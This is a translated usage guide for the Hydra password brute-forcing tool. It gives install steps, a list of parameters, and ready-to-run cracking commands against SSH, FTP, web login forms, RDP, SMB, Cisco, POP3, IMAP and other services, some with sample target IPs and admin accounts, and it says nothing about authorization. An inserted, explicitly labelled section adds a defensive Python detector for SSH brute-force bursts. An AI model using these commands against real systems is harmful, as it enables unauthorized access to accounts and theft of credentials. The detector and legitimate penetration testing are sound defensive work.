Hydra Usage Guide: The Ultimate Brute-Forcing Tool

I. Introduction

Hydra is an open-source brute-force password cracking tool from the well-known hacker group THC; it can crack many kinds of passwords online. Official site: http://www.thc.org/thc-hydra. It supports passwords for AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

II. Installing Hydra

wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz

tar zxvf hydra-8.1.tar.gz

cd hydra-8.1

./configure

make && make install

III. Parameters

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

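-R Resume cracking from where the previous session left off.

-S Connect using SSL.

-s PORT Specify a non-default port.

-l LOGIN Specify the user to crack; targets one specific user.

-L FILE Specify a user-name dictionary.

-p PASS Lowercase: specify a single password to try. Rarely used; a password dictionary is the usual choice.

-P FILE Uppercase: specify a password dictionary.

-e ns Optional. n: try an empty password; s: try the specified login name as the password.

-C FILE Use a colon-separated format, e.g. "login:password", instead of the -L/-P options.

-M FILE Specify a file listing the targets, one per line.

-o FILE Specify the output file for results.

-f When used with -M, stop cracking as soon as the first login/password pair is found.

-t TASKS Number of threads to run concurrently; the default is 16.

-w TIME Maximum timeout in seconds; the default is 30s.

-v / -V Show detailed progress.

server Target IP.

service Service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp and so on.

OPT Optional parameters.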
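From the defender's side, the parameters above (dictionary-driven guesses, 16 parallel tasks by default) mean a run against SSH appears in the server's authentication log as a dense burst of failed logins from one source. The following detector is an added example, not part of the original post; the log layout (ISO timestamps), the threshold, the window, the sample lines and the name `detect_bruteforce` are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines (documentation IP ranges), not from a real host.
SAMPLE_LOG = """\
2024-03-10T12:00:01 web1 sshd[2101]: Failed password for root from 203.0.113.5 port 40001 ssh2
2024-03-10T12:00:01 web1 sshd[2102]: Failed password for root from 203.0.113.5 port 40002 ssh2
2024-03-10T12:00:02 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.5 port 40003 ssh2
2024-03-10T12:00:02 web1 sshd[2104]: Failed password for root from 203.0.113.5 port 40004 ssh2
2024-03-10T12:00:03 web1 sshd[2105]: Failed password for root from 203.0.113.5 port 40005 ssh2
2024-03-10T12:00:03 web1 sshd[2106]: Failed password for root from 203.0.113.5 port 40006 ssh2
2024-03-10T12:00:04 web1 sshd[2107]: Accepted password for root from 203.0.113.5 port 40007 ssh2
2024-03-10T12:05:00 web1 sshd[2201]: Failed password for alice from 198.51.100.7 port 50001 ssh2
2024-03-10T12:20:00 web1 sshd[2202]: Failed password for alice from 198.51.100.7 port 50002 ssh2
2024-03-10T12:20:30 web1 sshd[2203]: Accepted password for alice from 198.51.100.7 port 50003 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<kind>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside one sliding window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> every account name it tried
    flagged = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        ts, ip, user = datetime.fromisoformat(m["ts"]), m["ip"], m["user"]
        if m["kind"] == "Failed":
            users[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                rec = flagged.setdefault(ip, {"peak": 0, "success_after": []})
                rec["peak"] = max(rec["peak"], len(q))
        elif ip in flagged:                # success after a burst: likely guessed password
            flagged[ip]["success_after"].append(user)
    for ip, rec in flagged.items():
        rec["users"] = sorted(users[ip])
    return flagged

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

An entry with a non-empty `success_after` list is the one to escalate first: a successful login that follows a burst of failures from the same address points to a guessed password, not a user's typo.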

IV. Usage examples:

1. Cracking SSH:

hydra -l username -P password_dict -t threads -vV -e ns ip ssh

hydra -l username -P password_dict -t threads -o save.log -vV ip ssh

2. Cracking FTP:

hydra ip ftp -l username -P password_dict -t threads (default 16) -vV

hydra ip ftp -l username -P password_dict -e ns -vV

3. Cracking a web login submitted via GET:

hydra -l username -P password_dict -t threads -vV -e ns ip http-get /admin/

hydra -l username -P password_dict -t threads -vV -e ns -f ip http-get /admin/index.php

4. Cracking a web login submitted via POST:

hydra -l username -P password_dict -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"

(Parameter notes: -t sets 3 concurrent threads; -l sets the user name to admin; the dictionary is pass.txt; results are saved to out.txt; -f stops once one password has been cracked; 10.36.16.18 is the target IP; http-post-form means the attack targets a form whose password is submitted via HTTP POST; the last part of the quoted string is the message the server returns for a failed guess.)

5. Cracking HTTPS:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6. Cracking TeamSpeak:

hydra -l username -P password_dict -s port -vV ip teamspeak

7. Cracking Cisco:

hydra -P pass.txt 10.36.16.18 cisco

hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8. Cracking SMB:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9. Cracking POP3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10. Cracking RDP:

hydra ip rdp -l administrator -P pass.txt -V

11. Cracking http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12. Cracking IMAP:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

© 2023 Yourheart